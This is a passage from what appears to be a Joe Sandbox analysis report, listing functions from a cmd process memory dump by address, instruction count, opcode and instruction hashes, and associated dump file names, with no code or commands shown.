                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3ddc0570c3451fa80776bd7efe8a04a37ddab37516af1eec73777c66cb23a3e
                                                                        • Instruction ID: 70f87af0e1ad934ba1cc132a068a3b4a56d125f9428cbfee018d7815ef43ebcc
                                                                        • Opcode Fuzzy Hash: a3ddc0570c3451fa80776bd7efe8a04a37ddab37516af1eec73777c66cb23a3e
                                                                        • Instruction Fuzzy Hash: 2991B475D00215AFCB15DF68D894BAEFBB5AF4D700F154169EA14EB341D738D9008FA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0311E3F0 Relevance: .3, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 51d0f02117d9a4e9a25166593f93ba5cc001b39e4d2dcf859d0cf848eafef5f6
                                                                        • Instruction ID: a98a355519f5b2952438fc364a15951bc1c2991c57fd1a245034104be2a6d1c7
                                                                        • Opcode Fuzzy Hash: 51d0f02117d9a4e9a25166593f93ba5cc001b39e4d2dcf859d0cf848eafef5f6
                                                                        • Instruction Fuzzy Hash: 6B91F179A006158FDB28DB98C880BFDB7A5EB8C710F098475ED05DF644E734D961CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03156ACC Relevance: .2, Instructions: 226COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e0d2632ba2585b40e040e1e1c9811d3fe3f161c5b26de0c5e9521730411bfb57
                                                                        • Instruction ID: 7f270ad2e80ed151f36f66d04812e4172b17b24ed4cf16d64b1b589607c02a4d
                                                                        • Opcode Fuzzy Hash: e0d2632ba2585b40e040e1e1c9811d3fe3f161c5b26de0c5e9521730411bfb57
                                                                        • Instruction Fuzzy Hash: 91818F71A00619DBDB18CF69C950ABEBBF9FB4C700F44852EE855E7640E734D940CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031CAB40 Relevance: .2, Instructions: 222COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                        • Instruction ID: 07b33b26718f58b567dc567321bb4ac540f9ddc1a7a3bae614fb8d90704497d2
                                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                        • Instruction Fuzzy Hash: 3E817E35A202499FCF19CF98C890ABEB7B6BF98310F19816DD8169B384DB34E941CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313E284 Relevance: .2, Instructions: 212COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 245b20436f6f57dda1dda9b15661b7b8f81cfe0d377421d60ea92039e8223567
                                                                        • Instruction ID: 9d7d4b92e967f051f1e3caeb8c7c1ab5aad7210c1c82cdbe8b4af94b078a20f7
                                                                        • Opcode Fuzzy Hash: 245b20436f6f57dda1dda9b15661b7b8f81cfe0d377421d60ea92039e8223567
                                                                        • Instruction Fuzzy Hash: EA814C71A00709AFDB25CFA5C880AEEBBBAFF4D354F144429E555A7250D730AC55CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0311C640 Relevance: .2, Instructions: 206COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0bb45a887b82a5ae7c7ed80b226d7e02d795b3ff39b5815fbfce67aa7cf2e392
                                                                        • Instruction ID: ad474b340128610adbd1c6bc221cf7f89ab36d45d94e34238456c7fba5eb1909
                                                                        • Opcode Fuzzy Hash: 0bb45a887b82a5ae7c7ed80b226d7e02d795b3ff39b5815fbfce67aa7cf2e392
                                                                        • Instruction Fuzzy Hash: 35719CB68046659FCB29CF98D8506FEBBB5FF5C710F15416AE851AB350E3709860CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031B47A0 Relevance: .2, Instructions: 202COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c1c0734fb5e21851bc35709378e4d75b0cd102846408cbdd5bec995d09e39d31
                                                                        • Instruction ID: 74eb799679d9071017e5f9f372e5e488000cc3b1d564ebc585b59f8b2d23b74e
                                                                        • Opcode Fuzzy Hash: c1c0734fb5e21851bc35709378e4d75b0cd102846408cbdd5bec995d09e39d31
                                                                        • Instruction Fuzzy Hash: 6B717270900204EFCB14EFA6DA41ADAFBF9FF8D310F14915AE655AB259CB319980CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0311260B Relevance: .2, Instructions: 201COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 95a3e4cbb6b8b1109325aaaaaa31dde152b7f6bfbcbd56c65177a168b14001bf
                                                                        • Instruction ID: 41df06a52883c82642c1b756bb70adddd6657182a137e18288ed2cce5b09de72
                                                                        • Opcode Fuzzy Hash: 95a3e4cbb6b8b1109325aaaaaa31dde152b7f6bfbcbd56c65177a168b14001bf
                                                                        • Instruction Fuzzy Hash: 7A71E2356042419FC315DF28C480BAAB7E5FF8C310F0989B9E899CB395DB34D896CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0318035C Relevance: .2, Instructions: 198COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                        • Instruction ID: 80be38e4bb2443bde50f7701cfeadc3ba2346b81924e9c75481697c5c5432992
                                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                        • Instruction Fuzzy Hash: B6716D75A00609AFCB11EFA9C984EDEBBB9FF4C700F144569E505AB250DB30EA45CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031962A0 Relevance: .2, Instructions: 198COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aa65e127bddf2a437600b90f55d6eac7924f7582ce6d95d662e26fa2629bad5b
                                                                        • Instruction ID: 192039f8330f2d6e30780f9a90136b312750f2b39f5b1f3b981e1c8f58278b48
                                                                        • Opcode Fuzzy Hash: aa65e127bddf2a437600b90f55d6eac7924f7582ce6d95d662e26fa2629bad5b
                                                                        • Instruction Fuzzy Hash: 34710336200B01EFEB35DF54C844F5AB7E5EF4C760F15482AE21A8B2A0D775E984CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03108AA0 Relevance: .2, Instructions: 197COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b812e01a2170fa087a240d6dbb4172dcaa5ed1c6a343ff3c6ba97edec08b0e08
                                                                        • Instruction ID: 289771a9a69ef2da26d981c4096248019fa240979746674a0bd5e24673768b8c
                                                                        • Opcode Fuzzy Hash: b812e01a2170fa087a240d6dbb4172dcaa5ed1c6a343ff3c6ba97edec08b0e08
                                                                        • Instruction Fuzzy Hash: 3C81A172A083158FCB28DF98D480B6EB7B1FB4C310F1A452DD815AB281D7749D92CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031D8324 Relevance: .2, Instructions: 192COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 874130f812c2d3291a0de73cfdf24a4510c127c0099b63afee362c2f50bf3950
                                                                        • Instruction ID: 5c002f291bfb5114e75e354cabb36fd2ff1d9fd09ea5b869795372cb630b739b
                                                                        • Opcode Fuzzy Hash: 874130f812c2d3291a0de73cfdf24a4510c127c0099b63afee362c2f50bf3950
                                                                        • Instruction Fuzzy Hash: 39711A75E00209BFDB15DF94C881FEEBBB8FB09350F104569E625AA290D774AA45CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031BA250 Relevance: .2, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b985edff4b7c7aaaa18455aafed349b6d1ffea9608d3c00ee128c5cf6ecb029f
                                                                        • Instruction ID: 6113449723818a1711f6e574a087577428e06f2c06c9acc346ec84e8b1d26e60
                                                                        • Opcode Fuzzy Hash: b985edff4b7c7aaaa18455aafed349b6d1ffea9608d3c00ee128c5cf6ecb029f
                                                                        • Instruction Fuzzy Hash: 27518A72504711AFD721DA69C884A9BF7F8EF8D750F094929FA80DB250DB70ED058BA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031A8350 Relevance: .2, Instructions: 161COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2f552d1e62d3737190a4f379e2db629859ba4aab3b939e43623ec2ef8676a6ea
                                                                        • Instruction ID: 0b8e9cf1f5ffda461fc41902bc416393dca060e4d67abe40e211e42b2ff45dbb
                                                                        • Opcode Fuzzy Hash: 2f552d1e62d3737190a4f379e2db629859ba4aab3b939e43623ec2ef8676a6ea
                                                                        • Instruction Fuzzy Hash: BC515D74900B049FD720DF9AC884BAAFFF8BF58715F104A1EE156976A0D770A585CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313E443 Relevance: .2, Instructions: 158COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 98f43f02e193408ff592a10180f69df39d203312de5a83feeb90ab9da0edf45a
                                                                        • Instruction ID: 701f56a023142fadd48512fbf3861b43e1bf38e9ab18b4e2ec529f760e87b177
                                                                        • Opcode Fuzzy Hash: 98f43f02e193408ff592a10180f69df39d203312de5a83feeb90ab9da0edf45a
                                                                        • Instruction Fuzzy Hash: F351597A200B04DFCB21EF64C980FAAB3B9FF0D650F45086AE5559B260D734E995CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031A4180 Relevance: .2, Instructions: 156COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f64c49351b34e3a48e667f5f380c096776936102de4f33377fe6b3e3851dc30c
                                                                        • Instruction ID: c25004d5c1a548f141fe75163feda01d732ee7e685029786a74770e66798a7cc
                                                                        • Opcode Fuzzy Hash: f64c49351b34e3a48e667f5f380c096776936102de4f33377fe6b3e3851dc30c
                                                                        • Instruction Fuzzy Hash: 3A5143796087119FC754DF2AC880A6BB7E9BFC8209F84492EF499C7350EB70D9058B92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031245B1 Relevance: .2, Instructions: 156COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                        • Instruction ID: 39bd2651f5741a24d70a158b529ecd24692690d33bbbdc573d1662f72d3cd97e
                                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                        • Instruction Fuzzy Hash: 1551BF75E00629ABCF15CF96C440BEEBBB9EF4D340F048069E911AB240DB74DD54CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031C8B28 Relevance: .2, Instructions: 152COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a67bde734dc10d28ff42aee4c22167c039ac628048c547c1d5aca3b1390ddf93
                                                                        • Instruction ID: 0418d1f14c34968c27a79d44da354b9a4c6062c359b676351bb7370349397f99
                                                                        • Opcode Fuzzy Hash: a67bde734dc10d28ff42aee4c22167c039ac628048c547c1d5aca3b1390ddf93
                                                                        • Instruction Fuzzy Hash: 6041E7707216909BC729DB29C8D4BBBF7DAEFA8620F08811DE8658B280D734DC41C695
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0318CBF0 Relevance: .1, Instructions: 148COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 37959d7e9b93d547a0e87324f6126621be64a2a8737ec837e264a02d9886a66a
                                                                        • Instruction ID: f69a459ae70a13a5072f0ceb7459e53f76fb9b4909ba3416c609c22a71d023da
                                                                        • Opcode Fuzzy Hash: 37959d7e9b93d547a0e87324f6126621be64a2a8737ec837e264a02d9886a66a
                                                                        • Instruction Fuzzy Hash: DD518B75900219DFCB24FFA9C88099EFBBAFB4C758B15865AD505A7304D730A941CFE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031301F8 Relevance: .1, Instructions: 138COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 41646b193026dd2fae3bb49757b023168b3d4c626426a576c3fa71974b5148bd
                                                                        • Instruction ID: 9d76d4ab0ef8e7cd063b245dd673069668d38bbf4daeaff1524757da73bdb332
                                                                        • Opcode Fuzzy Hash: 41646b193026dd2fae3bb49757b023168b3d4c626426a576c3fa71974b5148bd
                                                                        • Instruction Fuzzy Hash: 5C419C75900219DBCB14DF98C840AEEF7B5BF4E710F19816AE81AEB240E7359D41CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0312EBFC Relevance: .1, Instructions: 138COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1338216ea991bf5282c29c18f3fb2a0574d9302643b6913320a5d88f72653994
                                                                        • Instruction ID: 703465ad4d0d36dcd988497c00348bee2ab73081f0c6bb8f3cee3f06591e4c9d
                                                                        • Opcode Fuzzy Hash: 1338216ea991bf5282c29c18f3fb2a0574d9302643b6913320a5d88f72653994
                                                                        • Instruction Fuzzy Hash: 1741D4716043019FD724EF64C880A5BBBEAFF8C224F05487AE556C7615DB31F8A5CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142750 Relevance: .1, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                        • Instruction ID: 36779e19c3e4fe1f486c1878897cb6082b53636d60f84be488d81894d16b3b01
                                                                        • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                        • Instruction Fuzzy Hash: 79514C75A00615DFCB14CF58C580AAEF7B6FF88710F2C81A9D816AB354D731AE82CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03106154 Relevance: .1, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
